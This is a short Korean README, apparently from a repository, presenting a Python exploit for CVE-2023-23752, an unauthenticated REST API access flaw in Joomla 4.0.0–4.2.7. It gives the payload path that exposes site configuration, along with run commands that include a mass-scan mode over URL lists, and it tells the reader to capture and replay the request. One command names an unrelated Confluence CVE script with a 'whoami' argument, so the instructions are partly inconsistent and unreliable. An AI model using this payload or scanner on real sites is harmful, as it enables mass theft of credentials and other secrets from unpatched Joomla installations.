
Python 기반 익스플로잇으로, CVE-2023-23752를 대상으로 Joomla 4.0.0-4.2.7의 승인되지 않은 REST API 액세스를 공략하여 조작된 페이로드를 통해 민감한 정보를 노출시킵니다.
CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability
python 라이브러리 설치
pip install -r requirements.txt
취약점 확인
python3 CVE-2022-26134_check.py -u url -c whoami

대량 스캔
python3 CVE-2023-23752.py -f url_part.txt

4.0.0 <= Joomla <= 4.2.7
payload:
/api/index.php/v1/config/application?public=true
취약점 주소에 접속하여 패킷을 캡처하고, 패킷을 재전송합니다.

Joomla! CMS 버전 4.0.0-4.2.7에서 웹 서비스 엔드포인트에 대한 액세스 제한이 적절하지 않아, 인증되지 않은 Rest API 접근이 발생할 수 있으며, 이로 인해 민감한 정보가 유출될 수 있습니다.